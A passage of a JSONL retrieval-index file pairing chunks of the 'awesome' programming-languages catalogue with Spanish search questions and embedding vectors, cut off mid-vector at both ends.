-0.09187, -0.04316, 0.05897, -0.08802, 0.05262, 0.07876, 0.04846, 0.05727, 0.03329, 0.02007, 0.00232, 0.00824, -0.06525, 0.01778, -0.07415, -0.09369, -0.11297, -0.02666, 0.02003, -0.06459, 0.07372, -0.08598, 0.02323, -0.17567, -0.02311, 0.05226, -0.00664, -0.15561, 0.07363, -0.01877, 0.03479, -0.01985, 0.01347, -0.01125, -0.01991, 0.0164, 0.02937, 0.03916, 0.00258, 0.0025, 0.03476, 0.12598, -0.13795, 0.10118, -0.00642, -0.04417, -0.01055, -0.03388, -0.03488, -0.06529, -0.041, -0.05364, 0.04767, -0.03106, -0.04438, -0.02482, -0.01667, -0.00134, 0.05012, -0.06456, 0.06348, 0.00059, 0.0208, 0.03982, -0.03683, -0.02275, -0.05023, -0.00312, -0.05465, -0.04577, 0.01071, 0.05232, -0.01853, -0.0225, 0.01174, 0.02545, -0.0235, -0.00713, 0.03875, 0.09955, -0.01037, 0.0697, 0.00528, 0.01697, -0.00494, 0.09248, -0.01725, 0.01156, -0.08129, 0.00815, 0.03812, 0.00457, 0.01352, 0.03185, 0.0252, 0.02573, -0.01447, -0.0503, -0.03151, 0.02608, -0.04667, -0.01772, -0.0595, 0.01548, -0.03356, -0.01415, 0.0224, -0.07783, -0.00526, -0.01911, 0.04691, 0.00076, 0.00777, 0.00861, -0.05271, -0.01428, -0.0264, -0.04982, -0.07662, -0.08435, 0.03089, 0.08053, -0.0727, -0.01384, 0.03114]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: JavaScript. Promises. Standard Style β€” Style guide and linter. Must Watch Talks. Tips. Network Layer. Micro npm Packages. Mad Science npm Packages β€” Impossible sounding projects that exist. Maintenance Modules β€” For npm packages. npm β€” Package manager. AVA β€” Test runner. ESLint β€” Linter. Functional Programming. Observables. npm scripts β€” Task runner. 30 Seconds of Code β€” Code snippets you can understand in 30 seconds. Ponyfills β€” Like polyfills but without overriding native APIs. Swift β€” Apple's compiled programming language that is secure, modern, programmer-friendly, and fast. Education. Playgrounds. Python β€” General-purpose programming language designed for readability. Asyncio β€” Asynchronous I/O in Python 3. Scientific Audio β€” Scientific research in audio/music. CircuitPython β€” A version of Python for microcontrollers. Data Science β€” Data analysis and machine learning. Typing β€” Optional static typing for Python. MicroPython β€” A lean and efficient implementation of Python 3 for microcontrollers. Rust.", "indexar": "que programa hay para hacer anΓ‘lisis de datos y aprendizaje automΓ‘tico en Python?", "v": [-0.059, 0.06218, -0.05732, -0.32726, -0.01116, -0.14635, -0.01875, -0.04846, -0.21943, 0.06209, 0.07062, -0.07029, -0.01647, -0.00823, -0.08703, -0.02368, -0.00059, -0.13845, 0.04566, 0.00063, -0.08455, 0.00166, -0.10712, -0.09429, 0.05918, 0.11612, 0.00381, 0.04543, -0.07836, 0.14945, 0.03583, 0.12539, 0.04266, -0.04771, -0.10929, 0.03231, 0.07028, 0.05822, -0.00276, -0.01239, -0.06893, -0.03437, -0.03219, 0.0931, -0.00994, 0.02942, 0.05207, 0.07523, -0.03756, -0.06231, 0.02202, -0.0401, 0.04817, -0.06317, 0.07366, -0.09314, 0.03028, -0.05149, 0.09309, -0.06719, -0.05875, -0.00609, 0.01777, 0.01716, -0.00837, 0.0049, 0.11781, 0.06551, -0.06259, 0.17982, -0.00655, 0.06337, -0.00272, -0.03325, 0.05818, -0.00454, -0.06098, 0.03689, -0.02164, -0.02713, -0.12644, -0.10007, -0.04258, 0.06162, 0.02438, -0.0025, 0.0068, -0.06405, 0.07328, -0.02371, 0.00736, 0.16704, -0.00533, 0.0518, 0.05828, 0.08182, 0.12325, -0.11753, 0.02921, 0.05106, 0.01898, -0.08358, -0.00454, 0.12601, -0.02336, 0.15467, 0.01681, 0.037, -0.12628, 0.03548, 0.04882, -0.01536, -0.04752, -0.07017, -0.05189, -0.08017, 0.01014, 0.04936, 0.00307, 0.02929, -0.01839, 0.08036, -0.07253, -0.00918, -0.069, -0.00383, 0.0212, 0.12234, 0.04738, 0.04944, 0.01329, 0.00138, -0.05641, -0.00192, -0.00586, 0.08824, -0.00927, -0.0, -0.03727, -0.0705, -0.06535, 0.07451, -0.03377, 0.05195, 0.02857, -0.05822, 0.06832, -0.02933, -0.03414, 0.00503, -0.00889, 0.00217, 0.02541, 0.03711, -0.06691, -0.06558, -0.03578, -0.06964, -0.01653, -0.04262, 0.03199, 0.02324, 0.03111, -0.05496, 0.11181, -0.02955, 0.0053, 0.03095, 0.06446, 0.05152, -0.05762, 0.04908, 0.0521, -0.09081, 0.01323, -0.04179, 0.01553, -0.09861, -0.04658, -0.04196, -0.04478, -0.05213, 0.01319, -0.05609, 0.04774, -0.03077, 0.02581, -0.00826, 0.01713, -0.02092, -0.02487, 0.08126, -0.00468, -0.05809, 0.06254, -0.00944, 0.00159, 0.07301, 0.07215, -0.05158, -0.02368, 0.06692, -0.02565, -0.00751, -0.03687, 0.13205, -0.03453, -0.03885, 0.05273, -0.02761, 0.00337, -0.00841, 0.07356, -0.03123, 0.00113, -0.04866, -0.01067, 0.0473, 0.04363, 0.03037, -0.083, 0.03316, 0.07536, 0.03402, -0.0602, -0.04619, 0.03832, 0.02731, 0.03924, -0.01045, -0.05647, -0.0212, 0.00818, -0.00981, 0.03198, -0.02021, -0.039, -0.02115, -0.05286, -0.06468, -0.0025, 0.03978, -0.02273, -0.06203, -0.0131, -0.03314, -0.02731, 0.05275, -0.01344, -0.02918, -0.03866, -0.02844, 0.00182, -0.06399, 0.00644, 0.03919]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: JavaScript. Promises. Standard Style β€” Style guide and linter. Must Watch Talks. Tips. Network Layer. Micro npm Packages. Mad Science npm Packages β€” Impossible sounding projects that exist. Maintenance Modules β€” For npm packages. npm β€” Package manager. AVA β€” Test runner. ESLint β€” Linter. Functional Programming. Observables. npm scripts β€” Task runner. 30 Seconds of Code β€” Code snippets you can understand in 30 seconds. Ponyfills β€” Like polyfills but without overriding native APIs. Swift β€” Apple's compiled programming language that is secure, modern, programmer-friendly, and fast. Education. Playgrounds. Python β€” General-purpose programming language designed for readability. Asyncio β€” Asynchronous I/O in Python 3. Scientific Audio β€” Scientific research in audio/music. CircuitPython β€” A version of Python for microcontrollers. Data Science β€” Data analysis and machine learning. Typing β€” Optional static typing for Python. MicroPython β€” A lean and efficient implementation of Python 3 for microcontrollers. Rust.", "indexar": "cual es una herramienta para escribir cΓ³digo limpio y detectar errores automΓ‘ticamente?", "v": [0.01622, 0.09374, -0.11191, -0.19457, 0.02153, -0.20783, -0.10732, 0.07328, -0.09451, -0.08839, -0.06945, -0.12584, -0.07399, -0.13764, 0.16092, -0.0222, 0.10308, -0.09455, 0.04392, -0.08496, -0.0018, -0.03233, -0.06575, -0.05411, -0.04677, -0.02078, -0.02972, -0.02537, -0.171, 0.01146, -0.04523, 0.02331, 0.14302, -0.01242, -0.14545, 0.07955, 0.06709, 0.04948, -0.0749, 0.18633, 0.08104, 0.18004, -0.06581, 0.06977, 0.04747, -0.03987, 0.06681, 0.05258, 0.02287, 0.03419, 0.01904, -0.07749, -0.04744, -0.07064, -0.03669, 0.00219, 0.22038, -0.05243, 0.01842, -0.10907, -0.01552, 0.01455, -0.03549, -0.03944, -0.05863, -0.01921, 0.04144, -0.07405, -0.08895, 0.11085, 0.07091, 0.01305, 0.03238, 0.0754, 0.04556, 0.04031, 0.00945, -0.04219, 0.1148, 0.03739, -0.00745, -0.0444, -0.05674, 0.0081, 0.00972, -0.10925, 0.00356, -0.05513, 0.01144, -0.0803, 0.02713, -0.01803, 0.03761, 0.01438, 0.03359, -0.05074, 0.13386, -0.07496, 0.01571, 0.08009, 0.11301, -0.1696, -0.02812, 0.10712, 0.04407, 0.01319, -0.05784, 0.08129, -0.03619, -0.0835, -0.05691, -0.04348, -0.02779, -0.04377, -0.02202, 0.01129, 0.07292, -0.02036, -0.02335, -0.04114, -0.04047, -0.02056, -0.13505, -0.03536, 0.02253, -0.01391, 0.00925, 0.1207, 0.01665, -0.04244, -0.02401, -0.01379, -0.06236, 0.00499, 0.01751, 0.08092, 0.04896, -0.02364, -0.03515, 0.03313, -0.0292, 0.01757, -0.02314, -0.00592, 0.00734, 0.06482, -0.03358, -0.09096, -0.09156, 0.01856, -0.04922, 0.05004, -0.01554, 0.00548, -0.0609, 0.01421, -0.00341, 0.01048, -0.07205, -0.0538, -0.09487, -0.04092, 0.0286, 0.04744, 0.04323, -0.03532, 0.0553, 0.03818, 0.06801, -0.01314, -0.00372, -0.00281, 0.11448, -0.05267, 0.00178, -0.01281, -0.03042, 0.00522, -0.01306, -0.07126, -0.04403, -0.00015, -0.01699, -0.01397, 0.06413, 0.00571, 0.07928, -0.0111, 0.03632, -0.01942, 0.02262, -0.00645, 0.00695, -0.07453, 0.01278, 0.06028, 0.02358, -0.03351, 0.06218, -0.09388, -0.03639, 0.04989, -0.00806, 0.01043, 0.01007, 0.04267, -0.03486, -0.04604, 0.02555, 0.01032, 0.0508, -0.0112, 0.04607, -0.0316, -0.07124, 0.00209, -0.05683, 0.05278, 0.00774, -0.01816, 0.02751, -0.06602, 0.04206, -0.02711, -0.0237, 0.0071, 0.01211, 0.05326, 0.03953, 0.01772, -0.00411, -0.01176, -0.02921, -0.01159, 0.04526, -0.02135, 0.02997, -0.0329, -0.04176, -0.0458, 0.0305, -0.00056, 0.03522, -0.08971, 0.03229, 0.01156, 0.01779, -0.03377, -0.04767, -0.02682, -0.0496, -0.0322, 0.04461, -0.07973, 0.02751, -0.01456]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: JavaScript. Promises. Standard Style β€” Style guide and linter. Must Watch Talks. Tips. Network Layer. Micro npm Packages. Mad Science npm Packages β€” Impossible sounding projects that exist. Maintenance Modules β€” For npm packages. npm β€” Package manager. AVA β€” Test runner. ESLint β€” Linter. Functional Programming. Observables. npm scripts β€” Task runner. 30 Seconds of Code β€” Code snippets you can understand in 30 seconds. Ponyfills β€” Like polyfills but without overriding native APIs. Swift β€” Apple's compiled programming language that is secure, modern, programmer-friendly, and fast. Education. Playgrounds. Python β€” General-purpose programming language designed for readability. Asyncio β€” Asynchronous I/O in Python 3. Scientific Audio β€” Scientific research in audio/music. CircuitPython β€” A version of Python for microcontrollers. Data Science β€” Data analysis and machine learning. Typing β€” Optional static typing for Python. MicroPython β€” A lean and efficient implementation of Python 3 for microcontrollers. Rust.", "indexar": "con que puedo crear programas rΓ‘pidos y seguros para dispositivos pequeΓ±os?", "v": [0.0316, 0.07191, -0.19011, -0.16619, -0.0122, -0.11217, -0.03994, 0.04347, -0.07359, -0.13067, 0.01363, 0.04897, -0.02809, -0.10432, 0.01563, -0.03892, 0.01694, -0.03984, 0.08339, 0.07246, 0.14433, -0.10909, -0.1048, -0.06972, 0.02313, 0.02127, 0.15376, 0.06749, -0.19114, 0.04264, -0.0049, 0.12216, 0.10162, -0.0172, -0.18415, -0.06802, 0.02327, 0.05306, -0.00419, 0.01547, 0.02376, 0.06491, -0.028, 0.00273, 0.08105, 0.07673, -0.05907, -0.00127, 0.0573, -0.09218, -0.01061, 0.0373, -0.07637, -0.12057, -0.0735, -0.08394, 0.06116, -0.13665, -0.00628, -0.04918, -0.09043, 0.02486, 0.03103, 0.03215, 0.05321, -0.05565, 0.05538, 0.05151, -0.10638, -0.03044, 0.01021, -0.12632, 0.05163, -0.01302, 0.04091, 0.09539, -0.18017, -0.01642, 0.03178, 0.06161, -0.00636, 0.05105, 0.05241, -0.05426, -0.00241, -0.01411, -0.09293, 0.04945, 0.01952, -0.02056, 0.06521, -0.02289, 0.04018, 0.05561, -0.10833, 0.02205, 0.13938, 0.0158, 0.01512, 0.07887, -0.01877, -0.06735, -0.10852, 0.0904, -0.13321, -0.00244, 0.11927, 0.01205, 0.02247, -0.02233, 0.00971, 0.03452, 0.00256, -0.08762, -0.05607, 0.09223, -0.00997, -0.07403, 0.05442, -0.00184, -0.03084, 0.01842, -0.0249, 0.03447, 0.1144, -0.01912, -0.01782, 0.0717, -0.01452, 0.08222, 0.09861, -0.10052, -0.03926, -0.08888, -0.01356, 0.05465, -0.06118, -0.03292, 0.04109, 0.00979, 0.0789, 0.02299, -0.03222, -0.07026, 0.02524, 0.02207, -0.01298, 0.01751, 0.05689, 0.09968, -0.01065, 0.05754, -0.08404, 0.01869, -0.05863, 0.05753, -0.00341, -0.00505, -0.00198, 0.08618, -0.03656, 0.08879, 0.04538, 0.00145, 0.01317, -0.07329, 0.03698, 0.03427, 0.11833, 0.05881, -0.00758, 0.09113, 0.07496, -0.05759, 0.07178, 0.07317, -0.04008, 0.03647, 0.03946, -0.10384, -0.06268, 0.02167, -0.03941, 0.04641, -0.01516, -0.04891, 0.05498, 0.01997, 0.04455, 0.03004, -0.0215, 0.05669, 0.02698, 0.03328, -0.04013, -0.02179, 0.00983, -0.06961, 0.02033, 0.01192, -0.00181, -0.01872, -0.00217, -0.05247, 0.01864, 0.01282, -0.01941, 0.11309, 0.00392, 0.09507, -0.00068, 0.00218, 0.07013, 0.0149, -0.02432, -0.00526, -0.01384, 0.06482, 0.0247, 0.04022, 0.03807, -0.03952, 0.00237, 0.06246, -0.01913, -0.03565, -0.00755, -0.03422, 0.03498, -0.05846, 0.00669, -0.08778, -0.04403, -0.02663, 0.05462, 0.02741, -0.01165, -0.02864, -0.00146, 0.0346, -0.02354, 0.08066, 0.05125, -0.03753, -0.03255, 0.03271, -0.05366, 0.01545, -0.07607, -0.04281, -0.03181, 0.0097, 0.05035, -0.02049, -0.00787, 0.00576]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Pest β€” Parser generator. Haskell. PureScript. Go. Scala. Scala Native β€” Optimizing ahead-of-time compiler for Scala based on LLVM. Ruby. Clojure. ClojureScript. Elixir. Elm. Erlang. Julia β€” High-level dynamic programming language designed to address the needs of high-performance numerical analysis and computational science. Lua. C/C++ β€” General-purpose language with a bias toward system programming and embedded, resource-constrained software. R β€” Functional programming language and environment for statistical computing and graphics. Learning. D. Common Lisp β€” Powerful dynamic multiparadigm language that facilitates iterative and interactive development. Learning. Perl. Groovy. Dart. Java β€” Popular secure object-oriented language designed for flexibility to \"write once, run anywhere\". RxJava. J2ME β€” Java specification designed for old keypad phones and PDAs. Kotlin. OCaml. ColdFusion. Fortran. PHP β€” Server-side scripting language. Composer β€” Package manager. Pascal. AutoHotkey. AutoIt. Crystal.", "indexar": "que lenguaje es mejor para el anΓ‘lisis numΓ©rico de alto rendimiento?", "v": [-0.17526, 0.00068, -0.03544, -0.20392, -0.00322, -0.06254, -0.09446, 0.04488, -0.11865, -0.01873, -0.01325, -0.08888, -0.06642, 0.03743, 0.1474, 0.03143, -0.07859, 0.03294, -0.05444, -0.01293, -0.00464, -0.10966, -0.15546, -0.08523, 0.10777, 0.01814, 0.00208, 0.06941, 0.01586, 0.03041, -0.08541, 0.0862, 0.04215, -0.14124, 0.02339, 0.06974, 0.00837, 0.08993, 0.03504, 0.16908, -0.02366, -0.00756, -0.00404, -0.06492, 0.08509, -0.00958, -0.00984, 0.08238, 0.08607, -0.15163, 0.09281, -0.06874, 0.08834, -0.0641, -0.04979, -0.00191, 0.09025, 0.0371, 0.05693, -0.20104, 0.04056, -0.01035, -0.01101, -0.11249, 0.04562, -0.03948, -0.00932, -0.08312, 0.04695, -0.05343, -0.01895, 0.04457, -0.08628, 0.01979, 0.10879, 0.07397, -0.00884, 0.07198, 0.01291, 0.00457, 0.05046, -0.06789, -0.05813, 0.02468, -0.14317, -0.01801, 0.01929, -0.10833, 0.06985, 0.04442, -0.0506, -0.02647, -0.1446, -0.08045, -0.08962, -0.01732, 0.04693, -0.11451, 0.03608, 0.06804, 0.06749, -0.07492, -0.1083, 0.02491, 0.03323, 0.08992, 0.05226, -0.11639, -0.07174, 0.02514, 0.05135, -0.09287, -0.02968, -0.07475, -0.07654, -0.07082, 0.02385, -0.04591, -0.00837, -0.03757, -0.00916, 0.02059, -0.04582, -0.07314, -0.01941, -0.05459, 0.08622, 0.01448, 0.12632, 0.00408, -0.02654, -0.00305, 0.02766, -0.0174, -0.04105, 0.07302, 0.09731, 0.03078, -0.00226, -0.00839, -0.0073, 0.07092, -0.05862, 0.03811, 0.09052, 0.00953, 0.0228, -0.02942, -0.05022, 0.04161, 0.05697, 0.03448, 0.09116, 0.04679, -0.05927, -0.06631, 0.01323, -0.03304, -0.05882, 0.04581, 0.0163, -0.05859, 0.00488, 0.05584, 0.09367, -0.01875, -0.01534, 0.0091, 0.13123, 0.00622, -0.02865, -0.08076, 0.04985, -0.08507, -0.0125, 0.01558, 0.07559, 0.05426, -0.00991, -0.05047, -0.06977, -0.08294, -0.07358, -0.06842, 0.01543, -0.02981, 0.04833, -0.03239, -0.01427, -0.07126, 0.0653, 0.04987, -0.02753, -0.09632, 0.03786, -0.1018, -0.00122, -0.09217, 0.01853, -0.04341, -0.00801, -0.00216, 0.01745, -0.03768, 0.01052, 0.0943, -0.00616, -0.05517, -0.00392, 0.06486, 0.00462, -0.00994, 0.00498, -0.01622, -0.01401, 0.02292, -0.03453, 0.02244, 0.00924, -0.03189, 0.00806, -0.00912, 0.05014, -0.03268, -0.03264, -0.01666, -0.01388, -0.00667, 0.05033, 0.0033, -0.04044, 0.06322, 0.03807, 0.00964, -0.01693, 0.02687, -0.00856, -0.00389, 0.04389, -0.07411, -0.02646, 0.02801, -0.07819, -0.05954, -0.03104, 0.01902, -0.07446, -0.00814, -0.0014, -0.07175, 0.03117, -0.01083, 0.01444, -0.04056, 0.06965, 0.00817]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Pest β€” Parser generator. Haskell. PureScript. Go. Scala. Scala Native β€” Optimizing ahead-of-time compiler for Scala based on LLVM. Ruby. Clojure. ClojureScript. Elixir. Elm. Erlang. Julia β€” High-level dynamic programming language designed to address the needs of high-performance numerical analysis and computational science. Lua. C/C++ β€” General-purpose language with a bias toward system programming and embedded, resource-constrained software. R β€” Functional programming language and environment for statistical computing and graphics. Learning. D. Common Lisp β€” Powerful dynamic multiparadigm language that facilitates iterative and interactive development. Learning. Perl. Groovy. Dart. Java β€” Popular secure object-oriented language designed for flexibility to \"write once, run anywhere\". RxJava. J2ME β€” Java specification designed for old keypad phones and PDAs. Kotlin. OCaml. ColdFusion. Fortran. PHP β€” Server-side scripting language. Composer β€” Package manager. Pascal. AutoHotkey. AutoIt. Crystal.", "indexar": "con quΓ© puedo montar un compilador que genere cΓ³digo en tiempo anticipado?", "v": [-0.08686, 0.07668, -0.1571, 0.01689, -0.1093, -0.14408, 0.06272, 0.14931, -0.24158, -0.23745, -0.05367, -0.06822, 0.06893, -0.09024, 0.06148, -0.04026, 0.18725, -0.08591, 0.03121, 0.0115, -0.01068, -0.07268, -0.01177, -0.13883, 0.05207, -0.05923, 0.05709, 0.02272, -0.12448, 0.00615, 0.05038, 0.06028, 0.10465, -0.0191, -0.08008, -0.00451, 0.0463, 0.16915, -0.16413, 0.00478, -0.0607, -0.01102, -0.08789, -0.02141, 0.00685, -0.03423, 0.03627, 0.04533, -0.02516, 0.02716, -0.03123, 0.05237, -0.06458, 0.04337, 0.0016, -0.05347, 0.12491, -0.08963, -0.03682, 0.02247, 0.10577, 0.01168, 0.04608, 0.03554, -0.01946, -0.05401, -0.00647, 0.04789, -0.10815, 0.00419, -0.10793, 0.01961, -0.05834, -0.03349, 0.04452, 0.04417, -0.01629, -0.0665, 0.02668, 0.05119, -0.04085, -0.05011, -0.04691, -0.00706, -0.02924, -0.05241, 0.09199, -0.08918, -0.01585, -0.0949, 0.0956, 0.02855, 0.02575, 0.04394, 0.02262, -0.12227, 0.04469, 0.12035, 0.02178, 0.04647, -0.03619, -0.03581, 0.00149, 0.15512, 0.10657, 0.10319, 0.06503, 0.01636, 0.0933, -0.03794, -0.05209, 0.02425, -0.13751, -0.02102, -0.04889, -0.07652, 0.04708, 0.02929, -0.01884, -0.05778, -0.01236, 0.10591, -0.0473, -0.00218, 0.03871, 0.01424, 0.07969, 0.04825, -0.0402, -0.02835, -0.11232, -0.04708, -0.05584, -0.03595, -0.02024, 0.04934, 0.05253, 0.05572, 0.09731, 0.04063, 0.0361, 0.01628, 0.00518, 0.09978, -0.01553, 0.0424, -0.00253, -0.06791, -0.06319, -0.04223, 0.02561, 0.1498, -0.00215, 0.04792, -0.0827, 0.00131, 0.08528, 0.01153, 0.08784, 0.01302, 0.02361, 0.02936, -0.04861, -0.13084, 0.02458, -0.01414, -0.0253, -0.04761, 0.00373, -0.03781, 0.02737, 0.03322, 0.11399, -0.08087, 0.02003, -0.02859, -0.02937, -0.01734, -0.07811, 0.00354, 0.00424, 0.05006, 0.04186, 0.02734, -0.01508, -0.00607, 0.01779, 0.0145, -0.02725, 0.02686, 0.03527, 0.03122, 0.05806, 0.02297, -0.04117, -0.04658, -0.00656, 0.03003, 0.00408, -0.04324, -0.05775, -0.03115, 0.03644, -0.01845, 0.01779, 0.0337, -0.04777, 0.09745, -0.00766, 0.04929, 0.06903, 0.0112, 0.06423, -0.043, -0.03349, 0.00777, 0.02096, -4e-05, -0.01545, -0.02067, 0.01922, 0.01128, 0.03624, 0.00748, -0.02379, 0.01182, 0.03335, 0.05118, 0.04341, 0.04048, -0.00841, -0.00067, -0.03594, 0.00333, 0.04978, 0.03324, 0.02703, 0.00083, -0.02759, -0.03799, 0.0432, 0.03637, -0.01262, -0.0162, -0.03718, 0.00367, -0.06284, -0.01662, -0.03043, -0.04798, -0.03643, 0.02932, -0.0199, -0.07003, 0.00832, -0.02317]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Pest β€” Parser generator. Haskell. PureScript. Go. Scala. Scala Native β€” Optimizing ahead-of-time compiler for Scala based on LLVM. Ruby. Clojure. ClojureScript. Elixir. Elm. Erlang. Julia β€” High-level dynamic programming language designed to address the needs of high-performance numerical analysis and computational science. Lua. C/C++ β€” General-purpose language with a bias toward system programming and embedded, resource-constrained software. R β€” Functional programming language and environment for statistical computing and graphics. Learning. D. Common Lisp β€” Powerful dynamic multiparadigm language that facilitates iterative and interactive development. Learning. Perl. Groovy. Dart. Java β€” Popular secure object-oriented language designed for flexibility to \"write once, run anywhere\". RxJava. J2ME β€” Java specification designed for old keypad phones and PDAs. Kotlin. OCaml. ColdFusion. Fortran. PHP β€” Server-side scripting language. Composer β€” Package manager. Pascal. AutoHotkey. AutoIt. Crystal.", "indexar": "cuΓ‘l es la mejor opciΓ³n para programaciΓ³n orientada objetos segura y multiplataforma?", "v": [0.12218, -0.01588, -0.23224, -0.06278, 0.02979, -0.08011, 0.0369, -0.08268, -0.14588, -0.17893, -0.02643, -0.0997, 0.19494, 0.00213, -0.04446, 0.01311, 0.10874, -0.1304, 0.01256, -0.02558, -0.06792, -0.07909, -0.09625, -0.07191, -0.09453, -0.06476, 0.0729, 0.10457, -0.04715, -0.00992, 0.05828, 0.0332, 0.12946, -0.08243, -0.04727, 0.05242, -0.11561, -0.0229, 0.07749, -0.03011, -0.08351, 0.13185, 0.05673, 0.04315, 0.17085, 0.08478, 0.00087, 0.12074, -0.05949, -0.1633, -0.04916, -0.01538, -0.07745, -0.08384, 0.04269, -0.11483, 0.06762, -0.03725, 0.08024, -0.02464, 0.03538, 0.00917, -0.06277, 0.00537, 0.03673, 0.00952, 0.01767, 0.00125, -0.01433, -0.06483, 0.03216, -0.06669, -0.08172, 0.04561, -0.02325, 0.03964, -0.03916, 0.02935, 0.10404, 0.07782, -0.00922, -0.03109, -0.08255, 0.06154, -0.03742, -0.1127, -0.00042, -0.0144, -0.05548, -0.05305, 0.08463, -0.01314, -0.03657, 0.02007, -0.02802, -0.03373, 0.00421, 0.03728, 0.03542, 0.09953, 0.04763, -0.06955, -0.07175, 0.12905, -0.05716, 0.0475, 0.01949, -0.03304, 0.01036, -0.07838, 0.03635, 0.07561, -0.02104, -0.05334, -0.05037, -0.02068, -0.04356, 0.0182, 0.03883, 0.03935, -0.00283, -0.01022, -0.01518, -0.0078, 0.10398, 0.08422, -0.0118, 0.07396, -0.0554, 0.04441, -0.0575, -0.01515, -0.01444, 0.0089, -0.06553, -0.06813, 0.09226, -0.06271, 0.06379, -0.03709, 0.1121, 0.03354, 0.04206, 0.01143, 0.05969, -0.05095, 0.08373, 0.02775, -0.05491, 0.09623, -0.05711, 0.01383, 0.12888, 0.0346, -0.04426, 0.00546, -0.03886, -0.06849, -0.08551, 0.12627, 0.00237, 0.05053, -0.04131, -0.0017, 0.06418, -0.07955, -0.01067, 0.0254, 0.02188, -0.01749, 0.04293, 0.05118, -0.01238, -0.08135, -0.06224, -0.06642, -0.04141, -0.05392, -0.01081, -0.06519, -0.03849, 0.03202, -0.02019, -0.01818, 0.04014, -0.09251, 0.05938, 0.02221, -0.02603, -0.02971, 0.03484, 0.03252, -0.0139, -0.03922, 0.00634, -0.05106, -0.04247, -0.06552, -0.00702, 0.04316, -0.06662, -0.03688, 0.00143, -0.0373, 0.07099, 0.0418, -0.0941, 0.01947, 0.00833, 0.05795, 0.02438, -0.08789, 0.0862, -0.03533, -0.01498, -0.05473, -0.00694, 0.00353, -0.03062, 0.03049, -0.01268, -0.0376, -0.02925, -0.04036, 0.01762, -0.03296, 0.01777, 0.03125, 0.0211, 0.00417, 0.01357, -0.01116, -0.02215, -0.01028, 0.03784, 0.00974, 0.01794, -0.03044, -0.00248, -0.04294, -1e-05, 0.07171, -0.09494, -0.05746, -0.0236, -0.02996, -0.08041, 0.11815, -0.00152, -0.09006, -0.00869, 0.04027, 0.04745, -0.05421, -0.00924, -0.02901]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: CMake β€” Build, test, and package software. ActionScript 3 β€” Object-oriented language targeting Adobe AIR. Idris β€” General purpose pure functional programming language with dependent types influenced by Haskell and ML. Ada/SPARK β€” Modern programming language designed for large, long-lived apps where reliability and efficiency are essential. Q# β€” Domain-specific programming language used for expressing quantum algorithms. Imba β€” Programming language inspired by Ruby and Python and compiles to performant JavaScript. Vala β€” Programming language designed to take full advantage of the GLib and GNOME ecosystems, while preserving the speed of C code. Coq β€” Formal language and environment for programming and specification which facilitates interactive development of machine-checked proofs. V β€” Simple, fast, safe, compiled language for developing maintainable software. Move β€” Domain-specific programming language for writing safe smart contracts.", "indexar": "con que lenguaje programo puedo construir software de manera fiable y eficiente?", "v": [0.01344, 0.07156, -0.2214, -0.16654, 0.05632, -0.08052, 0.04685, -0.0188, -0.2151, -0.13843, -0.01781, 0.07639, 0.00953, -0.04599, -0.0015, 0.06065, 0.09044, -0.16195, -0.08684, -0.02123, 0.05889, -0.0585, -0.06059, -0.04999, 0.09938, -0.00138, 0.0764, -0.06692, -0.01825, 0.06287, 0.02954, 0.15182, 0.17112, -0.12627, -0.00741, 0.07627, -0.00949, 0.10546, -0.02832, 0.06649, 0.01718, -0.01393, -0.04916, 0.03252, 0.07419, -0.00586, 0.07879, -0.05838, 0.03661, -0.01738, -0.04159, -0.03652, 0.00666, -0.04344, 0.04162, -0.08602, 0.06964, -0.0508, -0.0234, -0.10776, -0.06588, 0.08094, 0.05611, -0.00951, 0.06874, 0.02828, 0.12094, -0.03892, -0.10585, -0.02513, 0.01015, 0.05692, -0.03686, 0.03659, 0.03632, 0.04229, -0.11269, -0.0101, 0.02572, -0.01721, -0.01951, -0.05837, -0.00183, 0.05961, -0.08316, -0.0804, 0.09662, -0.07986, 0.02079, -0.06413, -0.0531, 0.04226, -0.05705, 0.0425, 0.01207, -0.0211, 0.09465, 0.04694, 0.09482, 0.13066, -0.012, -0.12784, -0.03551, 0.11182, -0.00675, 0.04628, 0.07607, -0.04765, -0.0072, 0.00047, 0.03877, -0.03837, -0.06182, -0.09861, -0.06724, -0.07203, 0.00777, -0.10052, 0.04076, -0.05442, -0.03965, 0.07422, -0.0712, 0.00126, 0.02684, -0.06041, 0.05531, 0.10213, -0.04171, -0.00119, -0.03349, -0.04541, -0.00085, -0.02302, -0.04138, 0.05442, 0.05258, -0.03315, 0.00068, -0.04084, -0.02585, 0.07124, -0.00033, 0.02892, 0.04785, -0.04426, -0.01857, -0.08206, -0.06634, 0.0359, 0.01932, 0.06816, 0.03873, 0.11911, -0.11919, -0.05787, 0.04182, 0.00521, -0.07574, 0.0957, -0.05092, 0.02454, -0.01946, -0.0066, 